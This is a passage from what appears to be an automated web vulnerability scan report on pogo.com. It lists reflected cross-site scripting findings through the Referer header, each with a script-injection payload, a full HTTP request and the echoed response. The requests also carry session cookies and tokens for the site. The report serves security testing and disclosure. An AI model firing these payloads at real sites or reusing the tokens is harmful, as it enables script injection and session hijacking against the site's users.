Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=8c590</script><script>alert(1)</script>6d39ca2b1f

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 03:00:42 GMT
Server: Apache-Coyote/1.1
Content-Length: 26755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=8c590</script><script>alert(1)</script>6d39ca2b1f";
s.eVar2="pogo";
s.pageName="ClubPogo.com 5by5 0708 US page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:marketing::ClubPogo.com 5by5 0708 US page:Non Authenticated";
s.prop8="Non Authentic
...[SNIP]...

3.683. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7be6</script><script>alert(1)</script>279ffb5215 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=c7be6</script><script>alert(1)</script>279ffb5215

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:52:21 GMT
Server: Apache-Coyote/1.1
Content-Length: 20201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=c7be6</script><script>alert(1)</script>279ffb5215";
s.eVar2="pogo";
s.pageName="Boys & Girls Clubs of America";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:marketing::Boys & Girls Clubs of America:Non Authenticated";
s.prop8="Non Authenticat
...[SNIP]...

3.684. http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f536</script><script>alert(1)</script>b87bcf0ce7f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp?pageSection=homnav_iphone HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=9f536</script><script>alert(1)</script>b87bcf0ce7f

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:52:30 GMT
Server: Apache-Coyote/1.1
Content-Length: 21378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=9f536</script><script>alert(1)</script>b87bcf0ce7f";
s.eVar2="pogo";
s.pageName="Pogo iPhone Landing Page";
s.prop2="pogo";
s.channel="pogo";
s.eVar18="un_homnav_iphone";
s.prop7="POGO:pogo:marketing::Pogo iPhone Landing Page:Non Authenticated";
s.pro
...[SNIP]...

3.685. http://www.pogo.com/hotdeploy/us/promotions/swf/sidenav/club-promo/CLP_holidayPD_lftNav_alt2 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/promotions/swf/sidenav/club-promo/CLP_holidayPD_lftNav_alt2

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0766</script><script>alert(1)</script>1623b3caefc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /hotdeploy/us/promotions/swf/sidenav/club-promo/CLP_holidayPD_lftNav_alt2 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=a0766</script><script>alert(1)</script>1623b3caefc

Response

HTTP/1.1 404 /hotdeploy/us/promotions/swf/sidenav/club-promo/CLP_holidayPD_lftNav_alt2
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 03:00:26 GMT
Server: Apache-Coyote/1.1
Content-Length: 3799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=a0766</script><script>alert(1)</script>1623b3caefc";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

3.686. http://www.pogo.com/img/prize/en_US/cash-giveaway [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/img/prize/en_US/cash-giveaway

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5da67</script><script>alert(1)</script>55025bf1a96 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /img/prize/en_US/cash-giveaway HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=5da67</script><script>alert(1)</script>55025bf1a96

Response

HTTP/1.1 404 /img/prize/en_US/cash-giveaway
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:52:10 GMT
Server: Apache-Coyote/1.1
Content-Length: 3799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=5da67</script><script>alert(1)</script>55025bf1a96";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

3.687. http://www.pogo.com/login/entry.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/login/entry.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7abe6</script><script>alert(1)</script>b7c1c6fe8e2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Ffbconnect%2Fjs.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=7abe6</script><script>alert(1)</script>b7c1c6fe8e2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=DBFBE7E5DB27E8444071339BA4CA19A0.000195; com.pogo.unid=6606578824406775

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:52:44 GMT
Server: Apache-Coyote/1.1
Content-Length: 35235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=7abe6</script><script>alert(1)</script>b7c1c6fe8e2";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.688. http://www.pogo.com/login/pogo/setCookie.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/login/pogo/setCookie.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61995</script><script>alert(1)</script>fedd47ab6a7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /login/pogo/setCookie.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=61995</script><script>alert(1)</script>fedd47ab6a7
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.site=pogo; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:54:02 GMT
Server: Apache-Coyote/1.1
Content-Length: 35353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=61995</script><script>alert(1)</script>fedd47ab6a7";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.689. http://www.pogo.com/login/word-verification.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/login/word-verification.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a239f</script><script>alert(1)</script>d5873489ea2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /login/word-verification.jsp HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a239f</script><script>alert(1)</script>d5873489ea2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.site=pogo; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_pers=%20s_nr%3D1294536335943-New%7C1297128335943%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:52:10 GMT
Server: Apache-Coyote/1.1
Content-Length: 3799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=a239f</script><script>alert(1)</script>d5873489ea2";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

3.690. http://www.pogo.com/news/us/latestnews/news-2010.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/news/us/latestnews/news-2010.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7e2</script><script>alert(1)</script>a2f2ba94e0d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /news/us/latestnews/news-2010.jsp HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=bb7e2</script><script>alert(1)</script>a2f2ba94e0d

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:58:35 GMT
Server: Apache-Coyote/1.1
Content-Length: 36967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Pogo: Communit
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=bb7e2</script><script>alert(1)</script>a2f2ba94e0d";
s.eVar2="pogo";
s.pageName="Pogo News Latest Archive";
s.prop2="pogo";
s.channel="news";
s.prop7="POGO:news:messages::Pogo News Latest Archive:Non Authenticated";
s.prop8="Non Authenticated";
if (ty
...[SNIP]...

3.691. http://www.pogo.com/news/us/netiquette/net-2009.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/news/us/netiquette/net-2009.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83883</script>fce9da87ffa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

